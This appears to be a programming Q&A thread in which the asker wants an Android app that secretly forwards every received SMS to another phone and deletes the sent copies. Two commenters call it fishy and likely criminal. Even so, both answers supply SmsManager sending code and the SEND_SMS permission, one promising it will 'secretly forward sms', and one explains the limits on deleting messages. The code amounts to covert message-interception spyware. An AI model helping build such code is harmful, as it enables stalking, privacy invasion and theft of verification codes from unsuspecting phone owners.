# secretly forwards the received SMS to other number

Tags: java, android, sms

I am new to Android. I am trying to create an app which secretly forwards received SMS to another phone number and delete the sent sms from inbox. Currently i code it but it is not working properly. Following code i have tried :

```html
public class SMSListener extends BroadcastReceiver {

    // Get the object of SmsManager
    final SmsManager sms = SmsManager.getDefault();
String mobile,body;

    public void onReceive(Context context, Intent intent) {

        // Retrieves a map of extended data from the intent.
        final Bundle bundle = intent.getExtras();

        try {

            if (bundle != null) {

                final Object[] pdusObj = (Object[]) bundle.get("pdus");

                for (int i = 0; i < pdusObj.length; i++) {

                    SmsMessage currentMessage = SmsMessage.createFromPdu((byte[]) pdusObj[i]);
                    String phoneNumber = currentMessage.getDisplayOriginatingAddress();

                    String senderNum = phoneNumber;
                    String message = currentMessage.getDisplayMessageBody();
                     mobile=senderNum.replaceAll("\\s","");
                     body=message.replaceAll("\\s","+");


                    Log.i("SmsReceiver", "senderNum: "+ senderNum + "; message: " + body);


                    // Show Alert
                    int duration = Toast.LENGTH_LONG;
                    Toast toast = Toast.makeText(context,
                            "senderNum: "+ mobile+ ", message: " + message, duration);
                    toast.show();

                } // end for loop
            } // bundle is null

        } catch (Exception e) {
            Log.e("SmsReceiver", "Exception smsReceiver" +e);

        }
    }
}
```

Comment: Sounds fishy as hell

Comment: So what was the problem you are facing..? any error.?

Comment: I want to forward the received sms in mobile A to Mobile B automatically.Right after receiving in Mobile A ,it will be forwarded to Mobile B

Comment: I'm voting to close this question as off-topic because the goal seems to be to commit a crime.

Answer (score 1):

```
SmsManager sms = SmsManager.getDefault();
sms.sendTextMessage(phoneNumber, null, message, null, null);
```

use the above code to send message.

Add permission in manifest as follows

```
<uses-permission android:name="android.permission.SEND_SMS"/>
```

Or use the following code to send intent to messaging

```
Intent intent = new Intent(Intent.ACTION_VIEW, Uri.parse("sms:" + phoneNumber));     
intent.putExtra("sms_body", message); 
startActivity(intent);
```

Comment: it is simple code for sending text. I want to forward the received sms in mobile A to Mobile B automatically.Right after receiving in Mobile A ,it will be forwarded to Mobile B

Comment: In broadcast receiver add after receiving the message forward the message contents to the phone B using the above code

Answer (score 1):

You can secretly forward sms to another no by following code.

```
public void sendSMS(String phoneNo, String msg) {
    try {      
        SmsManager smsManager = SmsManager.getDefault();
        smsManager.sendTextMessage(phoneNo, null, msg, null, null);    
    } catch (Exception ex) {
        ex.printStackTrace();
    } 
}
```

Don't forget to add permission in AndroidManifest.xml to send message

```
<uses-permission android:name="android.permission.SEND_SMS" />
```

But you can't delete sms from phone secretly because from KITKAT to onwards it is necessary for your app to become default sms app only then you can delete the text from phone database.

Hope it helps.